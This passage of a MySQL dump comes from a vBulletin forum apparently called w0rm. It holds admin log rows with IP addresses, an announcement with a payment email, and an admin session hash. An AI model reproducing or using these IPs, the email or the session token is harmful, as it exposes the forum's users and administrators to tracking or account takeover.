(2619, 100, 1463697709, 'user.php', 'update', 'user id = 30', '5.220.255.27'), (2620, 100, 1463697711, 'user.php', 'modify', 'user id = 30', '5.220.255.27'), (2621, 100, 1463697715, 'user.php', 'edit', 'user id = 10', '5.220.255.27'), (2622, 100, 1463697716, 'user.php', 'edit', 'user id = 33', '5.220.255.27'), (2623, 100, 1463697717, 'user.php', 'edit', 'user id = 40', '5.220.255.27'), (2624, 100, 1463697718, 'user.php', 'edit', 'user id = 16', '5.220.255.27'), (2625, 100, 1463697719, 'user.php', 'edit', 'user id = 9', '5.220.255.27'), (2626, 100, 1463697723, 'user.php', 'edit', 'user id = 8', '5.220.255.27'), (2627, 100, 1463697728, 'user.php', 'update', 'user id = 10', '5.220.255.27'), (2628, 100, 1463697731, 'user.php', 'modify', 'user id = 10', '5.220.255.27'), (2629, 100, 1463697736, 'user.php', 'update', 'user id = 33', '5.220.255.27'), (2630, 100, 1463697741, 'user.php', 'update', 'user id = 40', '5.220.255.27'), (2631, 100, 1463697746, 'user.php', 'update', 'user id = 16', '5.220.255.27'), (2632, 100, 1463697752, 'user.php', 'update', 'user id = 9', '5.220.255.27'), (2633, 100, 1463697757, 'user.php', 'update', 'user id = 8', '5.220.255.27'), (2634, 100, 1463697763, 'moderator.php', 'showlist', '', '5.220.255.27'), (2635, 100, 1463697869, 'announcement.php', 'modify', '', '5.220.255.27'), (2636, 100, 1463697883, 'notice.php', 'modify', '', '5.220.255.27'), (2637, 100, 1463697891, 'resources.php', '', '', '5.220.255.27'), (2638, 100, 1463698017, 'moderate.php', 'posts', '', '5.220.255.27'), (2639, 387, 1463698105, 'announcement.php', 'update', 'announcement id = 1', '176.126.252.12'), (2640, 387, 1463698107, 'forum.php', '', '', '176.126.252.12'), (2641, 100, 1463698129, 'moderate.php', 'attachments', '', '5.220.255.27'), (2642, 100, 1463698132, 'moderate.php', 'events', '', '5.220.255.27'), (2643, 100, 1463698133, 'moderate.php', 'posts', '', '5.220.255.27'), (2644, 100, 1463698134, 'moderate.php', 'messages', '', '5.220.255.27'), (2645, 100, 1463698136, 'user.php', 'moderate', '', '5.220.255.27'), (2646, 100, 1463698141, 'attachment.php', 'types', '', '5.220.255.27'), (2647, 100, 1463698144, 'attachmentpermission.php', '', '', '5.220.255.27'), (2648, 100, 1463698145, 'attachment.php', 'intro', '', '5.220.255.27'), (2649, 100, 1463698146, 'moderate.php', 'attachments', '', '5.220.255.27'), (2650, 100, 1463698233, 'queries.php', 'modify', '', '5.220.255.27'), (2651, 100, 1463698234, 'diagnostic.php', 'list', '', '5.220.255.27'), (2652, 100, 1463698237, 'misc.php', 'chooser', '', '5.220.255.27'), (2653, 100, 1463698240, 'repair.php', 'list', '', '5.220.255.27'), (2654, 100, 1463698241, 'backup.php', 'choose', '', '5.220.255.27'), (2655, 100, 1463698249, 'stats.php', 'index', '', '5.220.255.27'), (2656, 100, 1463698254, 'stats.php', 'reg', '', '5.220.255.27'), (2657, 100, 1463698254, 'stats.php', 'top', '', '5.220.255.27'), (2658, 100, 1463698255, 'stats.php', 'activity', '', '5.220.255.27'), (2659, 100, 1463698260, 'subscriptions.php', 'transactions', '', '5.220.255.27'), (2660, 100, 1463698261, 'subscriptions.php', 'transactions', '', '5.220.255.27'), (2661, 100, 1463698263, 'adminlog.php', 'choose', '', '5.220.255.27'), (2662, 100, 1463698266, 'plugin.php', 'product', '', '5.220.255.27'), (2663, 100, 1463698269, 'plugin.php', 'modify', '', '5.220.255.27'), (2664, 100, 1463698281, 'subscriptions.php', 'modify', '', '5.220.255.27'), (2665, 100, 1463698283, 'subscriptions.php', 'add', '', '5.220.255.27'), (2666, 100, 1463698291, 'usertitle.php', 'modify', '', '5.220.255.27'), (2667, 100, 1463698300, 'usertitle.php', 'edit', 'usertitle id = 1', '5.220.255.27'), (2668, 100, 1463698310, 'usertitle.php', 'doupdate', 'usertitle id = 1', '5.220.255.27'), (2669, 100, 1463698312, 'usertitle.php', 'modify', '', '5.220.255.27'), (2670, 100, 1463698337, 'usertitle.php', 'add', '', '5.220.255.27'), (2671, 100, 1463698350, 'usertitle.php', 'insert', '', '5.220.255.27'), (2672, 100, 1463698351, 'usertitle.php', 'modify', '', '5.220.255.27'), (2673, 100, 1463698378, 'usertitle.php', 'add', '', '5.220.255.27'), (2674, 100, 1463698386, 'usertitle.php', 'insert', '', '5.220.255.27'), (2675, 100, 1463698388, 'usertitle.php', 'modify', '', '5.220.255.27'), (2676, 100, 1463698389, 'usertitle.php', 'add', '', '5.220.255.27'), (2677, 100, 1463698394, 'usertitle.php', 'insert', '', '5.220.255.27'), (2678, 100, 1463698395, 'usertitle.php', 'modify', '', '5.220.255.27'), (2679, 100, 1463698397, 'usertitle.php', 'add', '', '5.220.255.27'), (2680, 100, 1463698405, 'usertitle.php', 'insert', '', '5.220.255.27'), (2681, 100, 1463698407, 'usertitle.php', 'modify', '', '5.220.255.27'), (2682, 100, 1463698413, 'adminreputation.php', 'modify', '', '5.220.255.27'), (2683, 100, 1463698471, 'profilefield.php', 'modify', '', '5.220.255.27'), (2684, 100, 1463698476, 'profilefield.php', 'add', '', '5.220.255.27'), (2685, 100, 1463698480, 'admininfraction.php', 'modify', '', '5.220.255.27'), (2686, 100, 1463698486, 'admininfraction.php', 'editlevel', '', '5.220.255.27'), (2687, 100, 1463698489, 'admininfraction.php', 'editgroup', '', '5.220.255.27'), (2688, 100, 1463698491, 'admininfraction.php', 'editbangroup', '', '5.220.255.27'), (2689, 100, 1463698509, 'socialgroup_icon.php', '', '', '5.220.255.27'), (2690, 100, 1463698515, 'usergroup.php', 'modify', '', '5.220.255.27'), (2691, 100, 1463698525, 'usertitle.php', 'modify', '', '5.220.255.27'), (2692, 100, 1463698530, 'usertitle.php', 'remove', 'usertitle id = 4', '5.220.255.27'), (2693, 100, 1463698532, 'usertitle.php', 'kill', 'usertitle id = 4', '5.220.255.27'), (2694, 100, 1463698533, 'usertitle.php', 'modify', '', '5.220.255.27'), (2695, 100, 1463698538, 'usertitle.php', 'remove', 'usertitle id = 5', '5.220.255.27'), (2696, 100, 1463698540, 'usertitle.php', 'kill', 'usertitle id = 5', '5.220.255.27'), (2697, 100, 1463698541, 'usertitle.php', 'modify', '', '5.220.255.27'), (2698, 100, 1463698544, 'usertitle.php', 'remove', 'usertitle id = 6', '5.220.255.27'), (2699, 100, 1463698545, 'usertitle.php', 'kill', 'usertitle id = 6', '5.220.255.27'), (2700, 100, 1463698547, 'usertitle.php', 'modify', '', '5.220.255.27'), (2701, 100, 1463698549, 'usertitle.php', 'remove', 'usertitle id = 7', '5.220.255.27'), (2702, 100, 1463698551, 'usertitle.php', 'kill', 'usertitle id = 7', '5.220.255.27'), (2703, 100, 1463698552, 'usertitle.php', 'modify', '', '5.220.255.27'), (2704, 100, 1463698560, 'usergroup.php', 'modify', '', '5.220.255.27'), (2705, 100, 1463698576, 'user.php', 'find', '', '5.220.255.27'), (2706, 100, 1463698614, 'usergroup.php', 'modify', '', '5.220.255.27'), (2707, 100, 1463698628, 'usergroup.php', 'add', '', '5.220.255.27'), (2708, 100, 1463698652, 'accessmask.php', 'modify', '', '5.220.255.27'), (2709, 100, 1463698657, 'user.php', 'add', '', '5.220.255.27'), (2710, 100, 1463698657, 'user.php', 'modify', '', '5.220.255.27'), (2711, 100, 1463698669, 'user.php', 'find', '', '5.220.255.27'), (2712, 100, 1463698672, 'user.php', 'find', '', '5.220.255.27'), (2713, 100, 1463698690, 'user.php', 'edit', '', '5.220.255.27'), (2714, 100, 1463698700, 'user.php', 'edit', '', '5.220.255.27'), (2715, 100, 1463698704, 'user.php', 'edit', '', '5.220.255.27'), (2716, 100, 1463698707, 'user.php', 'edit', '', '5.220.255.27'), (2717, 100, 1463698711, 'user.php', 'edit', '', '5.220.255.27'), (2718, 100, 1463698714, 'user.php', 'edit', '', '5.220.255.27'), (2719, 100, 1463698717, 'user.php', 'edit', '', '5.220.255.27'), (2720, 100, 1463698721, 'user.php', 'edit', '', '5.220.255.27'), (2721, 100, 1463698727, 'passwordcheck.php', '', '', '5.220.255.27'), (2722, 100, 1463698744, 'email.php', 'genlist', '', '5.220.255.27'), (2723, 100, 1463698747, 'email.php', 'start', '', '5.220.255.27'), (2724, 100, 1463698763, 'thread.php', 'prune', '', '5.220.255.27'), (2725, 100, 1463698765, 'thread.php', 'killpoll', '', '5.220.255.27'), (2726, 387, 1463760181, 'forum.php', 'modify', '', '77.247.181.162'), (2727, 387, 1463760196, 'forum.php', 'modify', '', '77.247.181.162'), (2728, 387, 1463760226, 'forum.php', 'modify', '', '77.247.181.162'), (2729, 387, 1463760231, 'moderate.php', 'posts', '', '77.247.181.162'), (2730, 100, 1463770085, 'user.php', 'add', '', '5.220.247.242'), (2731, 100, 1463770179, 'user.php', 'update', '', '5.220.247.242'), (2732, 100, 1463770181, 'user.php', 'modify', 'user id = 388', '5.220.247.242'), (2733, 100, 1463770243, 'user.php', 'edit', 'user id = 388', '5.220.247.242'), (2734, 100, 1463770419, 'user.php', 'modify', '', '5.220.247.242'), (2735, 100, 1463770421, 'user.php', 'find', '', '5.220.247.242'), (2736, 100, 1463770427, 'user.php', 'find', '', '5.220.247.242'), (2737, 100, 1463770431, 'user.php', 'modify', '', '5.220.247.242'), (2738, 100, 1463770440, 'user.php', 'find', '', '5.220.247.242'), (2739, 100, 1463770440, 'user.php', 'edit', 'user id = 388', '5.220.247.242'), (2740, 100, 1463770490, 'user.php', 'find', '', '5.220.247.242'), (2741, 100, 1463770491, 'user.php', 'edit', 'user id = 388', '5.220.247.242'), (2742, 100, 1463770561, 'help.php', 'answer', '', '5.220.247.242'), (2743, 100, 1463770582, 'user.php', 'update', 'user id = 388', '5.220.247.242'), (2744, 100, 1463770586, 'user.php', 'modify', 'user id = 388', '5.220.247.242'), (2745, 100, 1463770588, 'user.php', 'edit', 'user id = 388', '5.220.247.242'), (2746, 100, 1463770617, 'adminpermissions.php', 'edit', 'user id = 388 (0day)', '5.220.247.242'), (2747, 100, 1463770630, 'adminpermissions.php', 'update', 'user id = 388 (0day) (0 » 491516)', '5.220.247.242'), (2748, 100, 1463770633, 'adminpermissions.php', '', '', '5.220.247.242'), (2749, 100, 1463770635, 'user.php', 'edit', 'user id = 388', '5.220.247.242'), (2750, 100, 1463770650, 'user.php', 'update', 'user id = 388', '5.220.247.242'), (2751, 100, 1463770715, 'user.php', 'editaccess', 'user id = 388', '5.220.247.242'), (2752, 100, 1463770721, 'user.php', 'updateaccess', 'user id = 388', '5.220.247.242'), (2753, 100, 1463770729, 'user.php', 'edit', 'user id = 388', '5.220.247.242'), (2754, 100, 1463770734, 'resources.php', 'viewuser', 'user id = 388', '5.220.247.242'), (2755, 100, 1463770735, 'resources.php', 'viewuser', 'user id = 388', '5.220.247.242'), (2756, 100, 1463770943, 'user.php', 'edit', 'user id = 388', '5.220.247.20'), (2757, 100, 1463770952, 'adminpermissions.php', 'edit', 'user id = 388 (0day)', '5.220.247.20'), (2758, 100, 1463770976, 'user.php', 'editaccess', 'user id = 388', '5.220.247.20'), (2759, 100, 1463770986, 'resources.php', 'viewuser', 'user id = 388', '5.220.247.20'), (2760, 100, 1463771001, 'help.php', 'answer', '', '5.220.247.20'), (2761, 100, 1465233390, 'options.php', '', '', '172.68.11.238'), (2762, 100, 1465233418, 'options.php', '', '', '172.68.11.238'), (2763, 100, 1465233432, 'options.php', 'options', '', '172.68.11.238'), (2764, 100, 1465233469, 'options.php', 'dooptions', '', '172.68.11.238'), (2765, 100, 1465233471, 'options.php', 'options', '', '172.68.11.238'); DROP TABLE IF EXISTS `adminmessage`; CREATE TABLE `adminmessage` ( `adminmessageid` int(10) unsigned NOT NULL AUTO_INCREMENT, `varname` varchar(250) NOT NULL DEFAULT '', `dismissable` smallint(5) unsigned NOT NULL DEFAULT '0', `script` varchar(50) NOT NULL DEFAULT '', `action` varchar(20) NOT NULL DEFAULT '', `execurl` mediumtext, `method` enum('get','post') NOT NULL DEFAULT 'post', `dateline` int(10) unsigned NOT NULL DEFAULT '0', `status` enum('undone','done','dismissed') NOT NULL DEFAULT 'undone', `statususerid` int(10) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`adminmessageid`), KEY `script_action` (`script`,`action`), KEY `varname` (`varname`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; DROP TABLE IF EXISTS `adminutil`; CREATE TABLE `adminutil` ( `title` varchar(50) NOT NULL DEFAULT '', `text` mediumtext, PRIMARY KEY (`title`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; INSERT INTO `adminutil` (`title`, `text`) VALUES ('datastorelock', '0'); DROP TABLE IF EXISTS `album`; CREATE TABLE `album` ( `albumid` int(10) unsigned NOT NULL AUTO_INCREMENT, `userid` int(10) unsigned NOT NULL DEFAULT '0', `createdate` int(10) unsigned NOT NULL DEFAULT '0', `lastpicturedate` int(10) unsigned NOT NULL DEFAULT '0', `visible` int(10) unsigned NOT NULL DEFAULT '0', `moderation` int(10) unsigned NOT NULL DEFAULT '0', `title` varchar(100) NOT NULL DEFAULT '', `description` mediumtext, `state` enum('public','private','profile') NOT NULL DEFAULT 'public', `coverpictureid` int(10) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`albumid`), KEY `userid` (`userid`,`lastpicturedate`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; DROP TABLE IF EXISTS `albumpicture`; CREATE TABLE `albumpicture` ( `albumid` int(10) unsigned NOT NULL DEFAULT '0', `pictureid` int(10) unsigned NOT NULL DEFAULT '0', `dateline` int(10) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`albumid`,`pictureid`), KEY `albumid` (`albumid`,`dateline`), KEY `pictureid` (`pictureid`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; DROP TABLE IF EXISTS `albumupdate`; CREATE TABLE `albumupdate` ( `albumid` int(10) unsigned NOT NULL DEFAULT '0', `dateline` int(10) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`albumid`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; DROP TABLE IF EXISTS `announcement`; CREATE TABLE `announcement` ( `announcementid` smallint(5) unsigned NOT NULL AUTO_INCREMENT, `title` varchar(250) NOT NULL DEFAULT '', `userid` int(10) unsigned NOT NULL DEFAULT '0', `startdate` int(10) unsigned NOT NULL DEFAULT '0', `enddate` int(10) unsigned NOT NULL DEFAULT '0', `pagetext` mediumtext, `forumid` smallint(6) NOT NULL DEFAULT '0', `views` int(10) unsigned NOT NULL DEFAULT '0', `announcementoptions` int(10) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`announcementid`), KEY `forumid` (`forumid`), KEY `startdate` (`enddate`,`forumid`,`startdate`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; INSERT INTO `announcement` (`announcementid`, `title`, `userid`, `startdate`, `enddate`, `pagetext`, `forumid`, `views`, `announcementoptions`) VALUES (1, 'Trusted Section', 387, 1463688000, 1892408400, 'w0rm is under new management, as you can see there will be launched a section named \"Trusted\" which only will be available to the most elite members and/or contributors.\r\n\r\nPayment & info: ke7hb@w0rm.ws', -1, 365, 29); DROP TABLE IF EXISTS `announcementread`; CREATE TABLE `announcementread` ( `announcementid` int(10) unsigned NOT NULL DEFAULT '0', `userid` int(10) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`announcementid`,`userid`), KEY `userid` (`userid`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; INSERT INTO `announcementread` (`announcementid`, `userid`) VALUES (1, 100), (1, 104), (1, 161), (1, 166), (1, 171), (1, 172), (1, 173), (1, 178), (1, 196), (1, 240), (1, 283), (1, 289), (1, 291), (1, 295), (1, 387); DROP TABLE IF EXISTS `attachment`; CREATE TABLE `attachment` ( `attachmentid` int(10) unsigned NOT NULL AUTO_INCREMENT, `userid` int(10) unsigned NOT NULL DEFAULT '0', `dateline` int(10) unsigned NOT NULL DEFAULT '0', `thumbnail_dateline` int(10) unsigned NOT NULL DEFAULT '0', `filename` varchar(100) NOT NULL DEFAULT '', `filedata` mediumblob, `visible` smallint(5) unsigned NOT NULL DEFAULT '0', `counter` int(10) unsigned NOT NULL DEFAULT '0', `filesize` int(10) unsigned NOT NULL DEFAULT '0', `postid` int(10) unsigned NOT NULL DEFAULT '0', `filehash` char(32) NOT NULL DEFAULT '', `posthash` char(32) NOT NULL DEFAULT '', `thumbnail` mediumblob, `thumbnail_filesize` int(10) unsigned NOT NULL DEFAULT '0', `extension` varchar(20) CHARACTER SET latin1 COLLATE latin1_bin NOT NULL DEFAULT '', PRIMARY KEY (`attachmentid`), KEY `filesize` (`filesize`), KEY `filehash` (`filehash`), KEY `userid` (`userid`), KEY `posthash` (`posthash`,`userid`), KEY `postid` (`postid`), KEY `visible` (`visible`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; DROP TABLE IF EXISTS `attachmentpermission`; CREATE TABLE `attachmentpermission` ( `attachmentpermissionid` int(10) unsigned NOT NULL AUTO_INCREMENT, `extension` varchar(20) CHARACTER SET latin1 COLLATE latin1_bin NOT NULL DEFAULT '', `usergroupid` int(10) unsigned NOT NULL DEFAULT '0', `size` int(10) unsigned NOT NULL DEFAULT '0', `width` smallint(5) unsigned NOT NULL DEFAULT '0', `height` smallint(5) unsigned NOT NULL DEFAULT '0', `attachmentpermissions` int(10) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`attachmentpermissionid`), UNIQUE KEY `extension` (`extension`,`usergroupid`), KEY `usergroupid` (`usergroupid`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; DROP TABLE IF EXISTS `attachmenttype`; CREATE TABLE `attachmenttype` ( `extension` char(20) CHARACTER SET latin1 COLLATE latin1_bin NOT NULL DEFAULT '', `mimetype` varchar(255) NOT NULL DEFAULT '', `size` int(10) unsigned NOT NULL DEFAULT '0', `width` smallint(5) unsigned NOT NULL DEFAULT '0', `height` smallint(5) unsigned NOT NULL DEFAULT '0', `enabled` smallint(5) unsigned NOT NULL DEFAULT '1', `display` smallint(5) unsigned NOT NULL DEFAULT '0', `thumbnail` smallint(5) unsigned NOT NULL DEFAULT '0', `newwindow` smallint(5) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`extension`), KEY `enabled` (`enabled`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; INSERT INTO `attachmenttype` (`extension`, `mimetype`, `size`, `width`, `height`, `enabled`, `display`, `thumbnail`, `newwindow`) VALUES ('bmp', 'a:1:{i:0;s:26:\"Content-type: image/bitmap\";}', 20000, 620, 280, 1, 0, 0, 0), ('doc', 'a:1:{i:0;s:32:\"Content-type: application/msword\";}', 20000, 0, 0, 1, 0, 0, 0), ('gif', 'a:1:{i:0;s:23:\"Content-type: image/gif\";}', 20000, 620, 280, 1, 0, 1, 0), ('jpe', 'a:1:{i:0;s:24:\"Content-type: image/jpeg\";}', 20000, 620, 280, 1, 0, 1, 0), ('jpeg', 'a:1:{i:0;s:24:\"Content-type: image/jpeg\";}', 20000, 620, 280, 1, 0, 1, 0), ('jpg', 'a:1:{i:0;s:24:\"Content-type: image/jpeg\";}', 100000, 0, 0, 1, 0, 1, 0), ('pdf', 'a:1:{i:0;s:29:\"Content-type: application/pdf\";}', 20000, 0, 0, 1, 0, 1, 0), ('png', 'a:1:{i:0;s:23:\"Content-type: image/png\";}', 20000, 620, 280, 1, 0, 1, 0), ('psd', 'a:1:{i:0;s:29:\"Content-type: unknown/unknown\";}', 20000, 0, 0, 1, 0, 1, 0), ('rar', 'a:1:{i:0;s:29:\"Content-type: unknown/unknown\";}', 100000, 0, 0, 1, 0, 0, 0), ('txt', 'a:1:{i:0;s:24:\"Content-type: plain/text\";}', 20000, 0, 0, 1, 2, 0, 0), ('zip', 'a:1:{i:0;s:29:\"Content-type: application/zip\";}', 100000, 0, 0, 1, 0, 0, 0); DROP TABLE IF EXISTS `attachmentviews`; CREATE TABLE `attachmentviews` ( `attachmentid` int(10) unsigned NOT NULL DEFAULT '0', KEY `postid` (`attachmentid`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; DROP TABLE IF EXISTS `avatar`; CREATE TABLE `avatar` ( `avatarid` smallint(5) unsigned NOT NULL AUTO_INCREMENT, `title` varchar(100) NOT NULL DEFAULT '', `minimumposts` int(10) unsigned NOT NULL DEFAULT '0', `avatarpath` varchar(100) NOT NULL DEFAULT '', `imagecategoryid` smallint(5) unsigned NOT NULL DEFAULT '0', `displayorder` smallint(5) unsigned NOT NULL DEFAULT '1', PRIMARY KEY (`avatarid`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; DROP TABLE IF EXISTS `bbcode`; CREATE TABLE `bbcode` ( `bbcodeid` smallint(5) unsigned NOT NULL AUTO_INCREMENT, `bbcodetag` varchar(200) NOT NULL DEFAULT '', `bbcodereplacement` mediumtext, `bbcodeexample` varchar(200) NOT NULL DEFAULT '', `bbcodeexplanation` mediumtext, `twoparams` smallint(6) NOT NULL DEFAULT '0', `title` varchar(100) NOT NULL DEFAULT '', `buttonimage` varchar(250) NOT NULL DEFAULT '', `options` int(10) unsigned NOT NULL DEFAULT '1', PRIMARY KEY (`bbcodeid`), UNIQUE KEY `uniquetag` (`bbcodetag`,`twoparams`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; DROP TABLE IF EXISTS `bookmarksite`; CREATE TABLE `bookmarksite` ( `bookmarksiteid` int(10) unsigned NOT NULL AUTO_INCREMENT, `title` varchar(250) NOT NULL DEFAULT '', `iconpath` varchar(250) NOT NULL DEFAULT '', `active` smallint(5) unsigned NOT NULL DEFAULT '0', `displayorder` int(10) unsigned NOT NULL DEFAULT '0', `url` varchar(250) NOT NULL DEFAULT '', `utf8encode` smallint(5) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`bookmarksiteid`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; INSERT INTO `bookmarksite` (`bookmarksiteid`, `title`, `iconpath`, `active`, `displayorder`, `url`, `utf8encode`) VALUES (1, 'Digg', 'bookmarksite_digg.gif', 1, 10, 'http://digg.com/submit?phase=2&url={URL}&title={TITLE}', 0), (2, 'del.icio.us', 'bookmarksite_delicious.gif', 1, 20, 'http://del.icio.us/post?url={URL}&title={TITLE}', 0), (3, 'StumbleUpon', 'bookmarksite_stumbleupon.gif', 1, 30, 'http://www.stumbleupon.com/submit?url={URL}&title={TITLE}', 0), (4, 'Google', 'bookmarksite_google.gif', 1, 40, 'http://www.google.com/bookmarks/mark?op=edit&output=popup&bkmk={URL}&title={TITLE}', 0); DROP TABLE IF EXISTS `calendar`; CREATE TABLE `calendar` ( `calendarid` int(10) unsigned NOT NULL AUTO_INCREMENT, `title` varchar(255) NOT NULL DEFAULT '', `description` varchar(100) NOT NULL DEFAULT '', `displayorder` smallint(6) NOT NULL DEFAULT '0', `neweventemail` text, `moderatenew` smallint(6) NOT NULL DEFAULT '0', `startofweek` smallint(6) NOT NULL DEFAULT '0', `options` int(10) unsigned NOT NULL DEFAULT '0', `cutoff` smallint(5) unsigned NOT NULL DEFAULT '0', `eventcount` smallint(5) unsigned NOT NULL DEFAULT '0', `birthdaycount` smallint(5) unsigned NOT NULL DEFAULT '0', `startyear` smallint(5) unsigned NOT NULL DEFAULT '2000', `endyear` smallint(5) unsigned NOT NULL DEFAULT '2006', `holidays` int(10) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`calendarid`), KEY `displayorder` (`displayorder`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; INSERT INTO `calendar` (`calendarid`, `title`, `description`, `displayorder`, `neweventemail`, `moderatenew`, `startofweek`, `options`, `cutoff`, `eventcount`, `birthdaycount`, `startyear`, `endyear`, `holidays`) VALUES (1, 'Default Calendar', '', 1, 'a:0:{}', 0, 1, 631, 40, 4, 4, 2012, 2018, 0); DROP TABLE IF EXISTS `calendarcustomfield`; CREATE TABLE `calendarcustomfield` ( `calendarcustomfieldid` int(10) unsigned NOT NULL AUTO_INCREMENT, `calendarid` int(10) unsigned NOT NULL DEFAULT '0', `title` varchar(255) NOT NULL DEFAULT '', `description` mediumtext, `options` mediumtext, `allowentry` smallint(6) NOT NULL DEFAULT '1', `required` smallint(6) NOT NULL DEFAULT '0', `length` smallint(5) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`calendarcustomfieldid`), KEY `calendarid` (`calendarid`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; DROP TABLE IF EXISTS `calendarmoderator`; CREATE TABLE `calendarmoderator` ( `calendarmoderatorid` int(10) unsigned NOT NULL AUTO_INCREMENT, `userid` int(10) unsigned NOT NULL DEFAULT '0', `calendarid` int(10) unsigned NOT NULL DEFAULT '0', `neweventemail` smallint(6) NOT NULL DEFAULT '0', `permissions` int(10) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`calendarmoderatorid`), KEY `userid` (`userid`,`calendarid`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; DROP TABLE IF EXISTS `calendarpermission`; CREATE TABLE `calendarpermission` ( `calendarpermissionid` int(10) unsigned NOT NULL AUTO_INCREMENT, `calendarid` int(10) unsigned NOT NULL DEFAULT '0', `usergroupid` smallint(5) unsigned NOT NULL DEFAULT '0', `calendarpermissions` int(10) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`calendarpermissionid`), KEY `calendarid` (`calendarid`), KEY `usergroupid` (`usergroupid`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; DROP TABLE IF EXISTS `cpsession`; CREATE TABLE `cpsession` ( `userid` int(10) unsigned NOT NULL DEFAULT '0', `hash` varchar(32) NOT NULL DEFAULT '', `dateline` int(10) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`userid`,`hash`) ) ENGINE=MEMORY DEFAULT CHARSET=latin1; INSERT INTO `cpsession` (`userid`, `hash`, `dateline`) VALUES (100, '86642d62ef8086f5c7f8b335c2f605d4', 1465233553); DROP TABLE IF EXISTS `cron`; CREATE TABLE `cron` ( `cronid` int(10) unsigned NOT NULL AUTO_INCREMENT, `nextrun` int(10) unsigned NOT NULL DEFAULT '0', `weekday` smallint(6) NOT NULL DEFAULT '0', `day` smallint(6) NOT NULL DEFAULT '0', `hour` smallint(6) NOT NULL DEFAULT '0', `minute` varchar(100) NOT NULL DEFAULT '', `filename` char(50) NOT NULL DEFAULT '', `loglevel` smallint(6) NOT NULL DEFAULT '0', `active` smallint(6) NOT NULL DEFAULT '1', `varname` varchar(100) NOT NULL DEFAULT '', `volatile` smallint(5) unsigned NOT NULL DEFAULT '0', `product` varchar(25) NOT NULL DEFAULT '', PRIMARY KEY (`cronid`), UNIQUE KEY `varname` (`varname`), KEY `nextrun` (`nextrun`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; INSERT INTO `cron` (`cronid`, `nextrun`, `weekday`, `day`, `hour`, `minute`, `filename`, `loglevel`, `active`, `varname`, `volatile`, `product`) VALUES (1, 1465272060, -1, -1, 0, 'a:1:{i:0;i:1;}', './includes/cron/birthday.php', 1, 1, 'birthday', 1, 'vbulletin'), (2, 1465235760, -1, -1, -1, 'a:1:{i:0;i:56;}', './includes/cron/threadviews.php', 0, 1, 'threadviews', 1, 'vbulletin'), (3, 1465233900, -1, -1, -1, 'a:1:{i:0;i:25;}', './includes/cron/promotion.php', 1, 1, 'promotion', 1, 'vbulletin'), (4, 1465272120, -1, -1, 0, 'a:1:{i:0;i:2;}', './includes/cron/digestdaily.php', 1, 1, 'digestdaily', 1, 'vbulletin'), (5, 1465792200, 1, -1, 0, 'a:1:{i:0;i:30;}', './includes/cron/digestweekly.php', 1, 1, 'digestweekly', 1, 'vbulletin'), (6, 1465272120, -1, -1, 0, 'a:1:{i:0;i:2;}', './includes/cron/subscriptions.php', 1, 1, 'subscriptions', 1, 'vbulletin'), (7, 1465232700, -1, -1, -1, 'a:1:{i:0;i:5;}', './includes/cron/cleanup.php', 0, 1, 'cleanup', 1, 'vbulletin'), (8, 1465233000, -1, -1, -1, 'a:1:{i:0;i:10;}', './includes/cron/attachmentviews.php', 0, 1, 'attachmentviews', 1, 'vbulletin'), (9, 1465272180, -1, -1, 0, 'a:1:{i:0;i:3;}', './includes/cron/activate.php', 1, 1, 'activate', 1, 'vbulletin'), (10, 1465233300, -1, -1, -1, 'a:1:{i:0;i:15;}', './includes/cron/removebans.php', 1, 1, 'removebans', 1, 'vbulletin'), (11, 1465233600, -1, -1, -1, 'a:1:{i:0;i:20;}', './includes/cron/cleanup2.php', 0, 1, 'cleanup2', 1, 'vbulletin'), (12, 1465272000, -1, -1, 0, 'a:1:{i:0;i:0;}', './includes/cron/stats.php', 0, 1, 'stats', 1, 'vbulletin'), (13, 1465233900, -1, -1, -1, 'a:2:{i:0;i:25;i:1;i:55;}', './includes/cron/reminder.php', 0, 1, 'reminder', 1, 'vbulletin'), (14, 1465272600, -1, -1, 0, 'a:1:{i:0;i:10;}', './includes/cron/dailycleanup.php', 0, 1, 'dailycleanup', 1, 'vbulletin'), (15, 1465233600, -1, -1, -1, 'a:2:{i:0;i:20;i:1;i:50;}', './includes/cron/infractions.php', 1, 1, 'infractions', 1, 'vbulletin'), (16, 1465233000, -1, -1, -1, 'a:1:{i:0;i:10;}', './includes/cron/ccbill.php', 1, 1, 'ccbill', 1, 'vbulletin'), (17, 1465233600, -1, -1, -1, 'a:6:{i:0;i:0;i:1;i:10;i:2;i:20;i:3;i:30;i:4;i:40;i:5;i:50;}', './includes/cron/rssposter.php', 1, 1, 'rssposter', 1, 'vbulletin'); DROP TABLE IF EXISTS `cronlog`; CREATE TABLE `cronlog` ( `cronlogid` int(10) unsigned NOT NULL AUTO_INCREMENT, `varname` varchar(100) NOT NULL DEFAULT '', `dateline` int(10) unsigned NOT NULL DEFAULT '0', `description` mediumtext, `type` smallint(5) unsigned NOT 